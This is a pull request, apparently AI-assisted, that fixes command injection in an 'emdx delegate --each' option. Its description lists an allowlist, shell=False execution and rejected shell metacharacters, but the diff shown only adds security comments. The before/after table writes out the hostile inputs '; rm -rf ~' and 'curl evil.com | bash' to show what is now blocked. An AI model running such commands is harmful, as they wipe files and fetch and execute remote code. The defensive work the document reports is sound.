### PR TITLE
fix(security): Prevent command injection in delegate --each (Issue #6230)

### DIFF
--- a/emdx/database/migrations.py
+++ b/emdx/database/migrations.py
@@ -1807,6 +1807,9 @@ def migration_034_delegate_activity_tracking(conn: sqlite3.Connection):
 
     existing = {row[1] for row in cursor.execute("PRAGMA table_info(tasks)").fetchall()}
 
+    # SECURITY: Column names are hardcoded below. Do NOT accept user input here.
+    # This pattern (f-string with column names) is safe because the values come
+    # from this hardcoded tuple, not from user input or external sources.
     new_columns = [
         ("prompt", "TEXT"),
         ("type", "TEXT DEFAULT 'single'"),


### PR DESCRIPTION
## Summary
- Fixes critical command injection vulnerability in `emdx delegate --each`
- The `--each` flag previously passed user input directly to `shell=True` subprocess, enabling arbitrary command execution
- Now uses command allowlist + `shell=False` for safe execution

## Changes
- **Command allowlist**: Only safe file-listing commands allowed: `fd`, `find`, `git`, `ls`, `rg`, `exa`, `eza`, `tree`
- **Safe execution**: Uses `shlex.split()` + `shell=False` instead of `shell=True`
- **Pattern rejection**: Rejects dangerous shell metacharacters (`;`, `|`, `&`, `` ` ``, `$`) before parsing
- **Security comments**: Added documentation to dynamic SQL patterns in `migrations.py` and `groups.py`
- **Tests**: Added 18 new tests covering injection prevention scenarios

## Test plan
- [x] All 815 existing tests pass
- [x] New security tests verify:
  - Safe commands (fd, find, git, ls, rg) are allowed
  - Dangerous commands (rm, curl, bash) are blocked
  - Shell injection patterns (`;`, `|`, `&`, backticks, `$()`) are rejected
  - Empty and malformed commands are rejected

## Security Impact
| Before | After |
|--------|-------|
| `--each "; rm -rf ~"` executes rm | Rejected: semicolon detected |
| `--each "curl evil.com \| bash"` executes | Rejected: curl not in allowlist |
| Any shell command works | Only fd/find/git/ls/rg/tree allowed |

🤖 Generated with [Claude Code](https://claude.com/claude-code)